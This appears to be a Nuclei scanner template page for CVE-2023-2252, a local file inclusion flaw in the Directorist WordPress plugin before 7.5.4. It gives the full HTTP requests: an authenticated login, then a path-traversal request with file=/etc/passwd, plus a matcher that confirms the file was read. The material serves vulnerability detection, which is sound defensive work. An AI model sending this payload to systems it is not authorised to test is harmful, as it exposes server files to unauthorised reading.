Directorist < 7.5.4 - Local File Inclusion
ID: CVE-2023-2252
Severity: low
Author: r3Y3r53
Tags: cve2023,cve,wpscan,lfi,directorist,wordpress,wp-plugin,wp,authenticated,wpwax
Description
Section titled “Description”Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.
YAML Source
Section titled “YAML Source”id: CVE-2023-2252
info: name: Directorist < 7.5.4 - Local File Inclusion author: r3Y3r53 severity: low description: | Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: Fixed in version 7.5.4 reference: - https://wpscan.com/vulnerability/9da6eede-10d0-4609-8b97-4a5d38fa8e69 - https://wordpress.org/plugins/directorist/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2252 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N cvss-score: 2.7 cve-id: CVE-2023-2252 cwe-id: CWE-22 epss-score: 0.00129 epss-percentile: 0.4773 cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: wpwax product: directorist framework: wordpress tags: cve2023,cve,wpscan,lfi,directorist,wordpress,wp-plugin,wp,authenticated,wpwax
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: regex part: body regex: - "root:[x*]:0:0"
- type: status status: - 200# digest: 490a0046304402203493b1145c648442ac959e405c8f8f5c1a8d3ad99d4b1960640d9638545b800e02206d103a1fa3ab223d842cb03ca0a8353bf0ad9eb76be921c87eb2eeb643b60fd2:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-2252.yaml"